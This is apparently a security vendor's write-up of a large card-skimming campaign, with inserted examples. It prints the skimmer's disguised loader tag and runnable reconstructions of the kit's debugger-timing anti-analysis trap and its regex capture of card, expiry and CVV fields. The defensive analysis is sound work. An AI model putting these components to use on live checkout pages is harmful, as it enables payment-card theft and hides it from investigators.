SecurityMetrics forensic experts have identified a 700-site skimming operation that uses a sophisticated, multi-channel kit designed to lock out analysts and mimic legitimate payment providers.

Credit card skimming is no longer just a few lines of messy code; it now resembles an intricate, well-planned threat campaign.
Recently, the SecurityMetrics Forensic Analysis team identified a massive, synchronized campaign involving 693 active credit card skimmers.
What SecurityMetrics Forensic Analysts found beneath the surface was a technically advanced skimmer kit designed to evade detection, impersonate legitimate payment forms, and exfiltrate stolen card data through multiple redundant channels.
Because of our unique position in the industry, SecurityMetrics is currently the only entity with the data to link these disparate attacks to a single infrastructure fingerprint.
This campaign is defined by a deliberate infrastructure choice built for rapid domain rotation at a low cost per domain: all 693 malicious domains share the same registration profile.
That shared profile gives the domains a veneer of legitimacy and makes automated blocklisting difficult. For security teams monitoring traffic, these are the registrar details associated with the threat:
REGISTRAR DETAILS
NiceNIC International Group Co., Limited • IANA #3765 • Hong Kong, China • abuse@nicenic.net
The skimmer is injected via an external <script> tag, disguised as a site metrics library. The attackers use a site-specific path—the victim’s own domain name as a subdirectory—to give each target its own payload endpoint:
<script type="text/javascript"
src="https://[maliciousdomain].top/[sitename]/metrics.js"
id="custom-[timestamp]-js"></script>
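The loader tag has a recognisable shape (a third-party host, the victim's own hostname used as a directory, a final segment of metrics.js, and an id of the form custom-[timestamp]-js), which makes it a cheap thing to scan page source for. The check below is an added example, not SecurityMetrics' code or the kit's own; the regexes, the sample HTML, the hostnames in it and the two-signal threshold are all constructed for illustration.

```javascript
// Added example, not from the SecurityMetrics write-up: flag external <script>
// tags that match the loader shape described above. The regexes, sample HTML,
// hostnames and the 2-signal threshold are constructed assumptions.

const SCRIPT_TAG_RE = /<script\b[^>]*>/gi;
const ATTR_RE = /\b(src|id)\s*=\s*["']([^"']*)["']/gi;

// Pull src/id out of every <script ...> opening tag in a page source.
function parseScriptTags(html) {
  const tags = [];
  for (const m of html.matchAll(SCRIPT_TAG_RE)) {
    const attrs = {};
    for (const a of m[0].matchAll(ATTR_RE)) attrs[a[1].toLowerCase()] = a[2];
    if (attrs.src) tags.push(attrs);
  }
  return tags;
}

// Score each third-party script against the loader's traits:
//   * the victim's own hostname used as a directory in the path
//   * a final path segment of metrics.js
//   * an id of the form custom-<digits>-js
//   * a .top TLD (the only TLD the write-up shows)
function findSkimmerLoaders(html, siteHostname) {
  const lower = siteHostname.toLowerCase();
  const ownNames = new Set([lower, lower.replace(/^www\./, '')]);
  const hits = [];
  for (const { src, id } of parseScriptTags(html)) {
    let url;
    try { url = new URL(src); } catch { continue; } // relative src: first-party, skip
    if (ownNames.has(url.hostname.toLowerCase())) continue; // first-party host
    const parts = url.pathname.split('/').filter(Boolean);
    const signals = [];
    if (parts.slice(0, -1).some(p => ownNames.has(p.toLowerCase()))) signals.push('own-hostname-in-path');
    if (parts[parts.length - 1] === 'metrics.js') signals.push('metrics.js');
    if (typeof id === 'string' && /^custom-\d+-js$/.test(id)) signals.push('custom-<timestamp>-js id');
    if (url.hostname.endsWith('.top')) signals.push('.top TLD');
    // One trait alone (a genuine metrics.js, say) is common; two or more is worth a look.
    if (signals.length >= 2) hits.push({ src, host: url.hostname, signals });
  }
  return hits;
}

// Constructed page source: one ordinary analytics tag, one loader-shaped tag, one local script.
const SAMPLE_HTML = `
<script src="https://tag.example-analytics.net/v1/tag.js" async></script>
<script type="text/javascript"
src="https://cdn-stats-4821.top/shop.example.com/metrics.js"
id="custom-1712345678-js"></script>
<script src="/assets/checkout.js"></script>
`;

console.log(findSkimmerLoaders(SAMPLE_HTML, 'shop.example.com'));
```

Run it against a saved copy of the checkout page with the merchant's real hostname; anything returned deserves a look at the referenced URL and at the registrar of its host.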
The payload is a JavaScript file heavily obfuscated with control-flow flattening, hex-encoded variable names and a rotating string array, so signatures written against the payload body are brittle; the shape of the loader tag is the more stable indicator.
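The rotating string array is the part an analyst usually unwinds first, because once the table is recovered every accessor call can be replaced statically. The model below is an added example and not the kit's payload; the accessor name _0x3d1c, the offset, the rotation count and the strings (including the hypothetical kill-flag key) are constructed.

```javascript
// Added example, not the kit's payload: a reduced model of the rotating string
// array described above and the inverse an analyst applies to it. The accessor
// name _0x3d1c, the offset, the rotation count and the strings are constructed.

// An obfuscated payload ships every string literal in one array, rotated by a
// secret count. A startup loop rotates it back, and every use site calls an
// accessor that subtracts a fixed hex offset, so the source shows only calls
// like _0x3d1c(0x1f3). Control-flow flattening then hides which call is which.
function rotate(arr, n) {
  const out = arr.slice();
  for (let i = 0; i < n; i++) out.push(out.shift());
  return out;
}

const SHIPPED_ARRAY = ['localStorage', 'setItem', 'skimmer_killed', 'card', 'expiry', 'cvv'];
const ROTATIONS = 3;    // how far the startup loop rotates SHIPPED_ARRAY
const OFFSET = 0x1f0;   // subtracted from every accessor argument

// Recover the in-memory table exactly as the payload would at runtime.
function recoverTable() {
  return rotate(SHIPPED_ARRAY, ROTATIONS);
}

// Replace each accessor call with the literal it resolves to. The accessor is a
// pure lookup, so this is safe to do statically once the table is known.
function deobfuscate(code) {
  const table = recoverTable();
  return code.replace(/_0x3d1c\((0x[0-9a-f]+|\d+)\)/gi, (_, arg) => {
    const idx = parseInt(arg) - OFFSET;   // parseInt understands the 0x prefix
    if (idx < 0 || idx >= table.length) return `/* out of range: ${arg} */`;
    return JSON.stringify(table[idx]);
  });
}

// Constructed fragment in the style the obfuscator emits.
const OBFUSCATED = "window[_0x3d1c(0x1f3)][_0x3d1c(0x1f4)](_0x3d1c(0x1f5),'1');";
console.log(deobfuscate(OBFUSCATED));
// window["localStorage"]["setItem"]("skimmer_killed",'1');
```

On a real sample the rotation count is not a constant but a loop that runs until a checksum over the array matches; the practical shortcut is to execute just the array and its rotation loop in a sandbox, dump the resulting table, and then apply the same textual replacement.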
Our forensic deep dive revealed several high-level functions that separate this kit from "run-of-the-mill" malware.
The skimmer employs a debugger-timing trap to identify if a human analyst is watching. It records a performance.now() timestamp, triggers a debugger; statement, and measures the elapsed time.
If the time exceeds a threshold (100ms), indicating a human has paused on the breakpoint, the skimmer writes a kill flag to localStorage and terminates execution. On subsequent loads, it checks for this flag and silently exits, effectively "locking out" security researchers from seeing the malicious logic.
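A reconstruction of that trap, added here as an example (it is not the kit's code), written so it runs under Node without a browser: the storage object stands in for window.localStorage, the clock is injectable so the "analyst paused here" case can be simulated, and the KILL_FLAG key name is an assumption.

```javascript
// Added example, not the kit's code: a reconstruction of the debugger-timing trap
// described above, parameterised so it runs under Node without a browser. The
// KILL_FLAG key, the storage stand-in and the injectable clock are assumptions.

const KILL_FLAG = 'skimmer_killed'; // hypothetical localStorage key name

// `storage` mimics window.localStorage; `now` is the clock (injected in tests).
function debuggerTrap({ storage, now = () => performance.now(), thresholdMs = 100 }) {
  // Later loads: a previously tripped trap means an analyst was here; exit silently.
  if (storage.getItem(KILL_FLAG) === '1') return 'locked-out';
  const t0 = now();
  debugger; // pauses only with DevTools attached; otherwise effectively zero cost
  const elapsed = now() - t0;
  if (elapsed > thresholdMs) {       // someone sat on the breakpoint
    storage.setItem(KILL_FLAG, '1');  // persist the kill flag across reloads
    return 'tripped';
  }
  return 'clear'; // no debugger: proceed to the skimming logic
}

// In-memory localStorage stand-in (constructed for the example).
function makeStorage() {
  const m = new Map();
  return {
    getItem: k => (m.has(k) ? m.get(k) : null),
    setItem: (k, v) => { m.set(k, String(v)); },
    removeItem: k => { m.delete(k); },
  };
}

// Analyst counter-measure: clear the persisted flag and pin the clock the trap
// reads, so stepping through the payload no longer trips it.
function analystBypass(storage) {
  storage.removeItem(KILL_FLAG);
  return { storage, now: () => 0 }; // frozen clock: elapsed is always 0
}

// Walk-through with a fake clock that jumps 250 ms across the debugger statement.
function demo() {
  const storage = makeStorage();
  const ticks = [0, 250];
  const first = debuggerTrap({ storage, now: () => ticks.shift() });  // 'tripped'
  const second = debuggerTrap({ storage, now: () => 0 });             // 'locked-out'
  const third = debuggerTrap(analystBypass(storage));                 // 'clear'
  return [first, second, third];
}
console.log(demo());
```

In a real browser the equivalent bypass is to remove the flag from localStorage and override performance.now (or Date.now, whichever the sample reads) in the console before reloading, or to deactivate breakpoints in DevTools so debugger statements never pause; either way, expect the kit to have been written with this trap in mind and check for a second timing source before trusting the bypass.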
The kit uses regex-based input field identification to catch data even on non-standard forms, scanning for attributes like card, expiry, or cvv. To complete the deception, it loads card brand icons directly from Stripe’s CDN (js.stripe.com). By rendering these icons alongside its own fields, it creates a convincing visual match for Stripe-powered checkout forms.
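The field identification is what lets one payload work across merchants with differently named forms. The classifier below is an added example, not the kit's code: the kit's actual regexes are not on the page, so the patterns, the autocomplete map and the sample fields are constructed for illustration, and the grouping function goes one step beyond the text by collecting every matching field rather than the first.

```javascript
// Added example, not the kit's code: regex-based classification of payment inputs
// on forms with non-standard field names. The patterns, the autocomplete map and
// the sample fields are constructed for illustration; the kit's actual regexes
// are not shown in the write-up.

// Standard autocomplete tokens are the cheapest signal, so they are checked first.
const AUTOCOMPLETE_KINDS = {
  'cc-number': 'pan', 'cc-exp': 'expiry', 'cc-exp-month': 'expiry',
  'cc-exp-year': 'expiry', 'cc-csc': 'cvv', 'cc-name': 'name',
};

// Fallback: loose regexes over whatever text the field carries (name, id,
// placeholder, aria-label). Order matters: cvv/expiry first so "card code" or
// "cc-exp" are not swallowed by the broader card-number pattern.
const FIELD_PATTERNS = [
  { kind: 'cvv',    re: /(cvv|cvc|cvn|\bcid\b|security[-_ ]?code|card[-_ ]?code|verification[-_ ]?(code|value))/i },
  { kind: 'expiry', re: /(exp(iry|ire|iration)|exp[-_ ]?(date|month|year|mm|yy)|cc[-_ ]?exp|\bmm[-_\/ ]?yy\b)/i },
  { kind: 'name',   re: /(card[-_ ]?holder|name[-_ ]?on[-_ ]?card|cc[-_ ]?name)/i },
  { kind: 'pan',    re: /(card[-_ ]?(number|num|no)\b|cc[-_ ]?(number|num)|\bpan\b|credit[-_ ]?card)/i },
];

// `field` is a plain object standing in for an <input>'s attributes.
function classifyField(field) {
  const ac = (field.autocomplete || '').toLowerCase();
  if (AUTOCOMPLETE_KINDS[ac]) return AUTOCOMPLETE_KINDS[ac];
  const text = [field.name, field.id, field.placeholder, field['aria-label']]
    .filter(Boolean).join(' ');
  for (const { kind, re } of FIELD_PATTERNS) if (re.test(text)) return kind;
  return null;
}

// Group a form's fields by payment-data kind, keyed by name (or id).
function findPaymentFields(fields) {
  const found = {};
  for (const f of fields) {
    const kind = classifyField(f);
    if (!kind) continue;
    (found[kind] = found[kind] || []).push(f.name || f.id);
  }
  return found;
}

// Constructed sample form: none of these use a payment provider's default names.
const SAMPLE_FIELDS = [
  { name: 'email', placeholder: 'Email' },
  { name: 'ccnum_1', placeholder: 'Card number' },
  { id: 'card_expiration_month', autocomplete: 'off' },
  { name: 'cc-exp-year' },
  { name: 'securityCode', placeholder: 'CVC' },
  { name: 'notes', placeholder: 'Delivery notes' },
  { id: 'holder', autocomplete: 'cc-name' },
];
console.log(findPaymentFields(SAMPLE_FIELDS));
```

The same classifier is useful on the defensive side: run it over your own checkout's inputs to see which fields a kit like this would find without any site-specific tuning, and treat those as the ones whose change events deserve integrity monitoring.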
The skimmer registers multiple MutationObserver instances to detect changes to the checkout page in real time, so payment fields that are injected or re-rendered after the initial load are still captured.
This is where the campaign gets particularly aggressive. It uses a three-tier exfiltration strategy with automatic failover: if one channel is blocked or fails, the next is tried, so stolen data still reaches the C2 (command and control) server.
This campaign isn't just stealing data; it is also tagging where each record came from.
The exfiltrated data object includes the victim's browser user agent and the compromised site's origin, which lets the operator sort stolen card data by merchant.
In a landscape where attackers are using professional-grade infrastructure, you need forensic-grade protection. SecurityMetrics consistently monitors and discovers data trends, like this skimming operation, so SecurityMetrics customers can rest assured their data is protected.
Talk to a SecurityMetrics forensic analyst expert today to protect your sensitive data.